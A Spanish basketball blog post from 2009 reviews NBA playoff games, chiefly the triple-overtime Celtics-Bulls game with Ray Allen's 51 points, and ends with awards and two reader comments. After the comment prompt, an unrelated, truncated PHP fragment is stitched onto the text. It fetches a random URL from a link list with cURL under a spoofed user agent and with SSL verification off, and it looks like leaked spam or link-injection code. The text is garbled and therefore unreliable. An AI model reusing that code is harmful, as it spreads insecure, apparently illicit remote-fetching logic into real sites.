Playoffs (30/04/2009): Máxima tensión

01 de May de 2009 por TheDeerHunter

Pase lo que pase la serie Celtics-Bulls de este año pasará a la historia como una de las más vibrantes, polémicas y emocionantes de todas las que hayamos visto.

Anoche tres prórrogas más, por si no habíamos tenido suficiente con lo que hemos visto hasta el momento. Ya pueden tener el corazón sano los aficionados de ambos equipos. ¿Cómo resumir en un par de párrafos todo lo que sucedió?

Lo primero Ray Allen, sublime. En plan vendetta tras la expulsión del otro día. Pocos jugadores resultan tan majestuosos como él cuando se muestra en forma. Esa manera de armar el tiro como un relámpago. 51 puntos y 9 triples, metiendo uno de cada dos con la que estaba cayendo. El killer en su hábitat.

Para venganza también la de Brad Miller. Sensacional en situaciones muy complicadas logrando así la rendención de sus ya famosos tiros libres. Con Noah, se impusieron esta vez a la dupla Perkins-Davis… Más allá de las genialidades de las estrellas ese ha sido el factor que ha determinado la victoria en cada uno de los casos.

Después el Pierce vs Salmons. No le sirvió de mucho el otro día la buena defensa que implementó Salmons contra el tiro autómata de Pierce. Anoche el céltico lo pasó peor y la batalla se la ganó  anoche su rival, con unos 35 puntos sensacionales.Por último el duelo Rose vs Rondo… Rose también obtuvo la redención, con un saber estar  que sobrepasa su experiencia real. No sabemos muy bien porqué Rondo volvió a estar pasado de agresividad con otra bronca esta vez contra Hinrich. Ese punto de madurez lo ganó anoche el novato. No hay muchas maneras mejores de empezar en esto.

Por tanto, la serie nos ofrece otra joya más en forma de partido definitivo. Si habíamos alucinado hasta ahora un séptimo va a ser la bomba. Tened preparados vuestros dispositivos de grabación y agarraos los machos, que vienen curvas.

Las otras dos eliminatorias no le llegan ni a la suela de los zapatos a ésta. Ambas se resolvieron en el 6º con algunos partidos que no han sido precísamente la fiesta de los melones en cuanto a espectáculo ofrecido.

Los Rockets dejaron en la cuneta a unos Blazers decepcionantes, maniatados en ataque. Anoche no sobrepasaron los 20 puntos en ningún cuarto y al descanso ya estaba todo decidido, no tanto por la diferencia en el marcador sino por la incapacidad de McMillan de salir de ningún guión. La experiencia ha sido un grado, pero no sólo la de los jugadores. Adelman sabe utilizar sus fichas, por lo visto, bastante mejor que su rival. Anoche, fue Artest el ejecutor con una eficacia inusual de cara al aro mientras que enfrente, Aldridge y Roy jugaron sólos. Es lo que pasa si durante todo el año sólo los has utilizado en ataque a ellos.

Por último, Orlando terminó con los Sixers sin necesidad siquiera de utilizar a Howard. Es curioso que ha sido precísamente sin él como más perdida se ha visto la defensa de Philadelphia. Ayudó que Rashard Lewis, Pietrus y Redick dieran un paso adelante. Ahora si juegan bien sus cartas serán los favoritos para superar la 2ª ronda.

PREMIOS TJNBA:

MVP: Podríamos nombrar a John Salmons… pero Rashard Lewis no necesitó de 3 prórrogas para llegar a 29 puntos, 7 rebotes y 5 asistencias y sacar a su equipo de una situación complicada sin Dwight Howard.

El Rookie: Como no podía ser de otra manera, el omnipresente Derrick Rose. Como es lógico anoche fue galardonado con la inclusión en el quinteto de rookies junto a Westbrook, Mayo, Beasley y Brook Lopez. Los nuestros se caen al segundo sin nada que objetar al respecto.

La sorpresa: En Orlando tuvieron que hacer encaje de bolillos con tanta baja. Pero con Gortat y JR Redick deberían de estar más tranquilos para las futuras incontingencias.

La decepción: Rudy jugó uno de sus primeros partidos de titular de toda la temporada. No pudo aprovecharlo superado por la gran defensa de Houston, los nervios y sus problemas en su espalda.

El mayor esfuerzo en vano: Ray Allen, que en realidad merece el MVP de la jornada. 51 puntos, 5 rebotes, 3 asistencias, 3 robos y eficacia de dioses.

Comenta

2 comentarios a esta entrada

  1. javi dice:
    #1

    wow!!!!!Una de las mejores eliminatorias de los últimos años. Esto es el espectáculo NBA. Pensaba que los toros harían sudar a los celtics pro tanto….A ver que ocurre en el último pro pase lo que pase me he divertido con esta eliminatoria como hacá bastante tiempo.

    Por cierto, inexplicable lo de Rondo. Dime con quien andas y te diré como eres. Pues eso, el señor Garnett y el peliculero Pierce lo están llevando x el mal camino. Creo que debería ser sancionado, son ya dos días consecutivos liándola, en el 5º faltón a Miller y lo de ayer…, no se a que viene.

    Salu2

      Citar

  2. toni dice:
    #2

    Me quedé sobado en el segundo cuarto y cuando he visto en el “box score” los 51 pts del Sr. Allen, pensaba que era un error, que grande llega a ser este tio…
    A todo esto, ¿por quien apostais, por el campeon o por los “sorprendentes” Bulls?
    Me decanto por la experiencia de Pierce y allen junto con el dominio bajo los aros de los gorditos de verde jajajaja.

    A ver como empiezan los lakers la serie contra los rockets.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>